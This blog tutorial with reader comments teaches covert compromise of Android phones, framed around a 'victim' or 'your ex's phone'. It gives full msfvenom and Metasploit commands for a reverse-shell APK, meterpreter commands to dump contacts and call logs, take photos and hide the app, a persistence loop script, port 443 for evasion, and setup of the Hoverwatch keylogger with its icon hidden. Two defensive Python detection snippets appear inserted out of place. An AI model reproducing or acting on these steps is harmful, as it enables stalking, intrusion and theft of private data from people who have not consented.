Do you want to learn Android pen testing or just want to hack your ex's phone? I will explain everything from scratch. You do not need any previous knowledge for this.
Just read this post carefully with patience.
After reading this post, you can hack any android phone (but don’t expect any magic from me).
I will post 2-3 articles on Android hacking.
You will learn:
- How to hack Android using Linux OS
- Hack using any device
- Hack by Windows operating system
If you are a beginner, then read this article before reading this one. Otherwise, you will not properly understand this article.
Kali Linux tutorials for beginners
Stupid questions like ‘How to hack an android phone,’ ‘what is this,’ ‘My gf/bf cheating me please help me’ are not allowed.
Using the Linux operating system.
I am assuming you have read the Kali Linux tutorials for beginners. In Kali Linux, there is a tool known as Metasploit.
What is Metasploit
Metasploit is a framework where all types of pen testing tools are present. You can hack anything with it, like Windows PCs, servers, Android, etc. If you are a beginner, check out the Metasploit tutorial for beginners.
Practical 😀
Note: I’m using the same Wi-Fi network. At the end, I will show you how to hack a device that is not on your network. Keep reading.
First of all, we create a payload (you can call it an app), then install it on his/her phone. When your victim opens it, his/her device will be under your control.
Here is the command to run in the terminal
msfvenom -p android/meterpreter/reverse_tcp LHOST=your local IP LPORT=4444 -o appname.apk
This command will create an app in the current directory with the name appname. Of course, you can change it to anything. Let me explain this:
-p: for the payload. I have chosen reverse_tcp because it bypasses all kinds of firewall rules.
LHOST: your local IP address. Type ifconfig to find your IP address. Make sure your target mobile phone is using the same network. Later on, I will tell you how to hack Android phones that are outside of your network.
LPORT: for selecting the port number. I have chosen 4444 because it is free. You can choose any port, but in this particular case I recommend you choose 443. It is the port number for HTTPS, so if an expert scans the phone, he/she will ignore it because it is the port for HTTPS (it should be open). If he/she sees that port 4444 is open, then he/she can check the phone.
-o: for saving the app; you can use > too. It will keep the APK in the current directory.
After that, type msfconsole in the terminal. It will launch Metasploit.
Set your exploit to multi handler. Here is the command:
use exploit/multi/handler
(If you are confused by this command, read the Metasploit tutorial for beginners.)
Now we need to set the payload
set payload android/meterpreter/reverse_tcp
The show options command will show all the options. As you can see in the screenshot, we need to set LHOST (meaning the local IP address):
set LHOST 192.168.43.60
This is my IP; your IP will be different from this. I showed you above how to find the local IP address.
The port number should be the same as in msfvenom. Mine is 443.
set LPORT 443
Last command
type
run
Your system is ready for hacking the android phone.
Install the app that you created in the first step on your phone (for testing).
Open it (you will see nothing).
But on the computer side, you get the meterpreter session. This means you have hacked this device :).
In my case, I don’t know why I am facing this error
Don’t worry, run this command:
sessions -l
It will show output similar to this. Because I opened the app three times, I got 3 sessions.
In my case I got 3 sessions; I don’t know about your case, but we will select the last session. Command:
sessions -i 3
You got meterpreter sessions 😎
Type help to see what you can do.
You can do anything like taking screenshots, call details, keylogger, upload and download files, etc.
There are a lot of commands; here are some samples:
- To take a photo: webcam_snap
- To export all contacts: dump_contacts
- For call logs: dump_calllog
- To hide the app: hide_app_icon
You can download or upload files too if you know Linux commands
Moral: you can do anything.
How to send the APK file to the victim
If you send the file like this, he/she will definitely uninstall it because it shows nothing. You can hide the app icon using the hide_app_icon command.
App opens again and again automatically
But if the user cleans recent apps, then our connection will be lost.
To bypass this problem, follow these steps.
Open any text editor and copy and paste this code.
#!/bin/bash
while :
do
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
Save it as startagain.sh.
Make sure the extension is .sh.
When you get the meterpreter session, run these commands:
cd /sdcard/Download
upload startagain.sh
You will see something like this on uploading the script.
This means you have uploaded the script successfully. Run these commands to execute the script.
shell
cd /sdcard/Download
sh startagain.sh
After 5-10 seconds, press Ctrl+C like in the screenshot.
Don’t worry, we stop the shell, not the script.
As you can see in the screenshot, I got new meterpreter sessions every 20 seconds.
Until you reboot your phone, you will continuously get meterpreter sessions every 20 seconds.
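Seen from the network side, the relaunch loop described above produces a new connection from the phone to the same listener roughly every 20 seconds, and that regularity is what a monitoring tool can look for. The following is an added example, not part of the original post: the log format, the phone address 192.168.43.25 and the thresholds are constructed assumptions, while 192.168.43.60:443 is the listener address used in the article.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: new outbound TCP connections logged at a gateway as
# "epoch_seconds source_ip destination_ip destination_port".
SAMPLE_LOG = """\
1000 192.168.43.25 192.168.43.60 443
1003 192.168.43.30 203.0.113.10 443
1009 192.168.43.30 203.0.113.10 443
1020 192.168.43.25 192.168.43.60 443
1041 192.168.43.25 192.168.43.60 443
1060 192.168.43.25 192.168.43.60 443
1080 192.168.43.25 192.168.43.60 443
1090 192.168.43.30 203.0.113.10 443
1101 192.168.43.25 192.168.43.60 443
1300 192.168.43.30 203.0.113.10 443
1302 192.168.43.30 203.0.113.10 443
"""

def group_flows(log):
    """Group connection start times by (source, destination, port)."""
    flows = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        ts, src, dst, port = parts
        flows[(src, dst, int(port))].append(float(ts))
    return flows

def find_beacons(log, min_events=5, max_jitter=0.1):
    """Return flows whose connection gaps are nearly constant.

    Jitter is the standard deviation of the gaps divided by their mean;
    human-driven traffic is bursty, a sleep loop is not.
    """
    hits = []
    for key, times in group_flows(log).items():
        times.sort()
        if len(times) < min_events:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits.append((key, round(avg, 1)))
    return hits

if __name__ == "__main__":
    for (src, dst, port), interval in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}:{port} reconnects every ~{interval}s")
```

Port 443 does not hide this pattern: the check looks only at timing per source and destination pair, not at the port number.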
How to hack a device that is not in your network?
You can set up port forwarding on your router and then use your public IP address (search on Google for "my public IP"). If you are using mobile data, then buy a web server.
How to get a web server for free?
Google Cloud provides you a free web server with a credit of $300. You can use this money to install a Linux distribution (I think Debian costs $10/month). Install Kali Linux and do the same process; just change the IP to your public IP (Google will provide it).
Make sure you have a credit card for billing.
Hack Using any device
For this, we will use a special kind of app known as a keylogger app. It will record everything typed on the victim's keyboard and send it to you. There are many keylogger apps available for Android, but I will use hoverwatch.
This app is not available in the Google Play Store. You have to download it from the official site. This is the best free spy software of all the apps tested.
Just install it and receive log files online. There is only one limitation in this app: the free trial version lasts up to 3 days, so you can use hoverwatch free for only three days. Paid plans start from $8.33/month for a single device.
How to enable hoverwatch
- Open the hoverwatch official site, type your email and password, and click on the “Sign up Free” button.
- It will take you to the https://i.hoverwatch.com/app/index.html#add-device URL, where you can see a Download button. Click on it [make sure it is under the Android tab as shown in the screenshot].
- After downloading, install it on the phone you want. Don’t ask in comments how to install an app.
- After installing it, open the app. When you open this app, it will ask you about “I am going to use this software to monitor”. I recommend choosing my device; make sure Hide Hoverwatch Icon is selected and click on the OK button.
- On the next page, agree with the Legal Terms by tapping the I ACCEPT button. Then it will ask for “Activate device administrator”; click on the Activate button.
- On the next page, it will ask for your email and password, so enter the email and password that you created in the first step.
- Done. Now you are ready; you can view logs on the hoverwatch website. Sign in to your account and you can see all recorded keystrokes.
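Both techniques in this article leave the same traces on the phone: an installed app with no launcher icon (hide_app_icon, or the Hide Hoverwatch Icon option), a device-administrator grant, and, for the Metasploit payload, the package name com.metasploit.stage that appears in the relaunch script. The following is an added example, not part of the original post, showing a triage check over those traces; all package names other than com.metasploit.stage are hypothetical, and the device-administrator and launcher-icon sets are assumed to have been collected already from the device.

```python
DEFAULT_STAGE_PKG = "com.metasploit.stage"  # package name from the article's script

# Constructed sample inputs (hypothetical packages, not from a real device).
# THIRD_PARTY mimics the output of `adb shell pm list packages -3`.
THIRD_PARTY = """\
package:com.example.notes
package:com.metasploit.stage
package:com.example.syncservice
package:com.example.mdmagent
"""
DEVICE_ADMINS = {"com.example.syncservice", "com.example.mdmagent"}
HAS_LAUNCHER_ICON = {"com.example.notes", "com.example.mdmagent"}

def parse_packages(pm_output):
    """Extract package names from 'package:<name>' lines."""
    prefix = "package:"
    return [line.strip()[len(prefix):]
            for line in pm_output.splitlines()
            if line.strip().startswith(prefix)]

def triage(pm_output, device_admins, launcher_pkgs):
    """Return (package, reasons) for user-installed apps worth reviewing."""
    findings = []
    for pkg in parse_packages(pm_output):
        reasons = []
        hidden = pkg not in launcher_pkgs
        if pkg == DEFAULT_STAGE_PKG:
            reasons.append("default Metasploit stage package name")
        if hidden and pkg in device_admins:
            reasons.append("device administrator with no launcher icon")
        elif hidden:
            reasons.append("user-installed app with no launcher icon")
        if reasons:
            findings.append((pkg, reasons))
    # Most reasons first, then alphabetical for stable output.
    findings.sort(key=lambda f: (-len(f[1]), f[0]))
    return findings

if __name__ == "__main__":
    for pkg, reasons in triage(THIRD_PARTY, DEVICE_ADMINS, HAS_LAUNCHER_ICON):
        print(pkg, "->", "; ".join(reasons))
```

A visible device-administrator app such as the hypothetical com.example.mdmagent is not flagged, because the combination of admin rights and a hidden icon is the signal, not admin rights alone.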
By Windows 10 operating system
You can install Metasploit on Windows too. Click here to install all tools including Metasploit. This is the easiest way to hack an Android phone.
I have published the second part of Android hacking: install apps without touching the phone.
See i dont have targeted device with me but want to hack is that possible??
no
Is it possible to hack a phone by just knowing it’s phone number and geographical location?
no
I am stuck here. Explain where I went wrong please
[*] Started reverse TCP handler on 192.168.0.120:443
Process has been started now you need to open that app in your android phone
That’s not enough
Did you Read Second Article
Why I’m trying to hide apk. The session never open again as you said
How to solve this problem
Read the second part of Android hacking
Sir. I have problems when metasploit open session then after 30 seconds sessions closed reason died. and I’m trying to change port number always but nothing
How to solve this problem
Read android hacking part 2 you will find link inside this article
Sessions is not opening when I click mainactivity.apk on my Android
You did something wrong. Are your Android phone and Kali connected to the same Wi-Fi network?
Kdk bhai
thanks
Thank You For Sharing this Article
Really this is awesome tips sir thanks for guide me
welcome
I am getting ”: not foundsh[6]: :” while running ”sh startagain.sh” command. Everything else worked fine. What am i doing wrong in here! Any solution would be grateful.
because you did not download this file
The following error I am facing
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
I got stuck here and not running. my android(my own phone) and kali is on same network. my IP is also correct
how are you using kali is by dual boot or vmware
It’s really useful information for Beginner guide to Hack an Android phone easily. thanks for sharing this with us!
Hello sir, whenever my meterpreter session is established, I’m getting the following error, meterpreter session closed. What I can do to solve this error
Try to change port number
I have the same problem and I always change port number but nothing.
Hm, Read android hacking part 2 You will find link at the bottom of this page
Why Are you not trying
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.2.116:443
stuck here not running. my android and kali is on same network.
did you check your machine IP before starting the process
such a great article. very helpful post.
very helpful post such a informative article. thanks for sharing this.
I want to learn hacking mobile without touching or permission of other mobile.
Is it possible..
Any course offered to learn.
possible but not in days, you have to learn a lot best hacking courses
Nice a santy
thank you
It was terribly helpful on behalf of me. Keep sharing such ideas within the future similarly. This was truly what i used to be longing for, and that i am glad to came here! Thanks for sharing the such data with USA.